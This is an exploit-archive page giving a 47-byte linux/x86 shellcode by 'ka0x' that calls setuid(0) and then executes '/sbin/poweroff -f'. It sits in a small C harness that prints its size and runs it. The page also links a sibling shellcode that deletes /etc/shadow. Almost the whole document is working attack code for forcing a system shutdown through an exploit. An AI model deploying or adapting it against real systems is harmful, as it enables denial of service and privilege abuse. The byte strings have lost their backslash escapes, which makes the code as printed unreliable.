Linux - setuid(0) & execve("/sbin/poweroff -f")

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Linux - setuid(0) & execve("/sbin/poweroff -f")
# Published : 2009-12-04
# Author : ka0x
# Previous Title : Linux - setreuid (0,0) & execve(/bin/rm /etc/shadow)
# Next Title : win xp sp2 PEB ISbeingdebugged shellcode

#include <stdio.h>

/* 
	linux/x86 ; setuid(0) & execve("/sbin/poweroff -f") 47 bytes
	written by ka0x - <ka0x01[alt+64]gmail.com>
	lun sep 21 16:40:16 CEST 2009

	greets: an0de, Piker, xarnuz, NullWave07, Pepelux, JosS, sch3m4, Trancek, Hendrix and others!
*/

int main()
{
	char shellcode[] = 
			"x31xdb"		// xor ebx,ebx
			"x6ax17"		// push byte 0x17
			"x58"			// pop eax
			"xcdx80"		// int 80h
			"x8dx43x0b"		// lea eax,[ebx+0xb]
			"x99"			// cdq
			"x52"			// push edx
			"x66x68x66x66"	// push word 0x6666
			"x68x77x65x72x6f"	// push dword 0x6f726577
			"x68x6ex2fx70x6f"	// push dword 0x6f702f6e
			"x68x2fx73x62x69"	// push dword 0x6962732f
			"x89xe3"		// mov ebx,esp
			"x52"			// push edx
			"x66x68x2dx66"	// push word 0x662d
			"x89xe1"		// mov ecx,esp
			"x52"			// push edx
			"x51"			// push ecx
			"x53"			// push ebx
			"x89xe1"		// mov ecx,esp
			"xcdx80" ;		// int 80h

	printf("[*] ShellCode size (bytes): %dnn", sizeof(shellcode)-1 );
	(*(void(*)()) shellcode)();
	
	return 0;
}